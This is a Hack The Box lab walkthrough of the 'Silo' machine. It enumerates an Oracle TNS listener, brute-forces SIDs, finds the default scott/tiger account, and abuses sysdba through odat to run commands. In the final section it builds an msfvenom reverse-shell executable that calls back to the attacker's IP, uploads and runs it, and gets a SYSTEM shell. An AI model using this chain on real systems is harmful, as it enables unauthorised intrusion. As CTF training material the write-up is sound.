HTB: Silo

8 minute read

Summary

Silo was a machine that really taught how to enumerate an oracle sql database above anything else. You first bruteforce SIDS for the database which are kinda like database names but for oracle. With these SIDS you then bruteforce usernames and find that a default account is enabled on one of the SIDS which has sysdba privilege meaning you can run everything as sysdba which is kinda like running sudo but for oracle which gives you permissions to execute code on the remote machine, but more importantly allows you to upload a malicious exe file and execute it which gives you a reverse shell as system because the oracle database is running in the context of system, meaning there is no priv esc required for this machine. So without further or do lets get into SIlo from hackthebox!

Recon

$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Sat Jul 24 15:07:33 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.094s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open     oracle-tns     Oracle TNS listener 11.2.0.2.0 (unauthorized)
3367/tcp  filtered satvid-datalnk
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49159/tcp open     oracle-tns     Oracle TNS listener (requires service name)
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
--snipped---

And then an all port scan

$nmap -p- --min-rate 1000 -oN nmap/all-ports.txt $ip                                                                                                                                                                                    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:12 BST
Stats: 0:02:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 45.74% done; ETC: 15:18 (0:03:17 remaining)
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.077s latency).
Not shown: 45308 closed ports, 20215 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49159/tcp open  unknown
49161/tcp open  unknown

Enumeration of Services

SMB 445

There wasn’t anything I could get out of smb and just got access denied

$smbclient -L //$ip/
Enter WORKGROUP\purplerabbit's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/silo]
└──╼ $smbmap -H $ip
[!] 445 not open on 10.10.10.82....

HTTP 80

Going over to the webpage shows a default windows IIS Server page

Running a gobuster on this webpage showed no directories

I did a virtualhost bruteforce on the server but that didn’t return anything of value

RPC 135

Null RPC was disabled

$rpcclient -U '' $ip
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Oracle TNS Listener 1521

Oracle TNS Listener is a separate process that receives incoming traffic for the database server. Hacktricks has some good information on enumerating this service https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener

Looking at the version shows that its running 11.2.0.2.0

$nmap --script "oracle-tns-version" -p 1521 -T4 -sV $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:26 BST
Nmap scan report for 10.10.10.82
Host is up (0.12s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds

A google search shows that there are no vulnerabilities related to this version https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/version_id-107266/Oracle-Database-Server-11.2.0.2.html

Attempting to enuemrate SIDS with metasploit doesn’t work

msf6 auxiliary(scanner/oracle/sid_enum) > exploit

[-] 10.10.10.82:1521      - TNS listener protected for 10.10.10.82...
[*] 10.10.10.82:1521      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So I attempted to bruteforce SIDS using a metasploit module and I got a few SIDS

msf6 auxiliary(admin/oracle/sid_brute) > exploit
[*] Running module against 10.10.10.82

[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID ''

Next I attempted to enumerate usernames for these SIDS using odat https://github.com/quentinhardy/odat Which I installed by following its instructions in the git repo.

I couldn’t get any valid users with CLRExtProc and PLSExtProc however for XE odat found credentials

$python3 odat.py all -s 10.10.10.82 -p 1521 -d XE 
--snipped--
+] Valid credentials found: scott/tiger. Continue...
--snipped--

Next I installed sqlplus which was a real pain, however this guide https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573 helped a lot.

I was able to login to the oracle database using sqlplus, however there wasn’t much to see apart from the default databases.

$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE

SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

Looking at privileges shows this user only has connect and resource

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Running odat shows I can’t do anything of interest

$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE

This next part was probably the hardest part of the machine because from the researching I did I couldn’t find anything related to this part. But you needed to see that the scott user had the sysdba privilege which is kinda like sudo but for oracle https://docs.oracle.com/database/121/ADMQS/GUID-2033E766-8FE6-4FBA-97E0-2607B083FA2C.htm#ADMQS12004

Running sqlplus but with “as sysdba” shows we have a lot more privileges.

$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE as sysdba

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO
--snipped--

Running odat to see what we can do with sysdba shows we can do a lot more

$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE --sysdba
[+] Checking if target 10.10.10.82:1521 is well configured for a connection...    
[+] According to a test, the TNS listener 10.10.10.82:1521 is well configured. Continue...                                                                                                                                                    

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?            
[+] The target is vulnerable to a remote TNS poisoning                                                                                                                                                                                        
                                                           
[2] (10.10.10.82:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[2.1] UTL_HTTP library ?        
[+] OK                         
[2.2] HTTPURITYPE library ?
[+] OK                                                                                                                 
[2.3] UTL_FILE library ?                                                                                                                                                                                                                      
[+] OK                                                                                                                                                                                                                                        
[2.4] JAVA library ?                                                                                                                                                                                                                          
[-] KO                                                                                                                                                                                                                                        
[2.5] DBMSADVISOR library ?                                                                                                                                                                                                                   
[+] OK                                                                                                                                                                                                                                        
[2.6] DBMSSCHEDULER library ?                                                                                                                                                                                                                 
[+] OK                                                                                                                                                                                                                                        
[2.7] CTXSYS library ?                                                                                                                                                                                                                        
[+] OK                                                                                                                                                                                                                                        
[2.8] Hashed Oracle passwords ?                                                                                                                                                                                                               
[+] OK                                                                                                                                                                                                                                        
[2.9] Hashed Oracle passwords from history?                                                                                                                                                                                                   
[+] OK        
--snipped--

Shell as System

Looking at the diagram on odat to see what I can do shows I can do a number of things

I will first check to see if I can execute code on the webserver

$python3 odat.py dbmsscheduler -s $ip -d XE -U scott -P tiger --exec "ping 10.10.16.91" --sysdba

[1] (10.10.10.82:1521): Execute the `ping 10.10.16.91` on the 10.10.10.82 server
[+] The `ping 10.10.16.91` command was executed on the 10.10.10.82 server
[+] The Job is running

Running tcpdump showed that I received a ping from the remote host

$sudo tcpdump -i tun0 icmp
[sudo] password for purplerabbit: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:43:03.407736 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 1, length 40
08:43:03.407841 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 1, length 40
08:43:04.588852 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 2, length 40
08:43:04.588905 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 2, length 40
08:43:05.612807 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 3, length 40
08:43:05.612873 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 3, length 40
08:43:06.453765 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 4, length 40
08:43:06.453822 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 4, length 40

I then tried for several minutes to transfer netcat to get a reverse shell but I kept getting this error when I tried to transfer via smb or powershell

[-] The Job has failed: ORA-27370: job slave failed to launch a job of type EXECUTABLE
ORA-27300: OS system dependent operation:accessing job scheduler service failed with status: 109
ORA-27301: OS failure message: The pipe has been ended.
ORA-27302: failure occurred at: sjsec 9
ORA-27303: additional information: The pipe has been ended.

So I resorted to another way of getting the reverse shell to the machine

First I generated an x86 windows reverse shell with msfvenom

$msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.91 LPORT=4444 -f exe > shell.exe

Next I uploaded this file to the remote machine using the utlfile module from odat running the command

$python3 odat/odat.py utlfile -s $ip -d XE -U scott -P tiger --putFile "C:\Windows\Temp" shell.exe shell.exe --sysdba

I then executed this exe file that uploaded using the externaltable modules (note that I’m getting example syntax for all of these modules from odat’s wiki https://github.com/quentinhardy/odat/wiki/externaltable)

$python3 odat/odat.py externaltable -s $ip -d XE -U scott -P tiger --exec "C:\Windows\Temp" shell.exe --sysdba

This then gave a reverse shell into the system as system

$nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.16.91] from silo.htb [10.10.10.82] 49168
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

Meaning that the oracle sql databasa was running in the context of system.

That was silo from hackthebox! Hope you enjoyed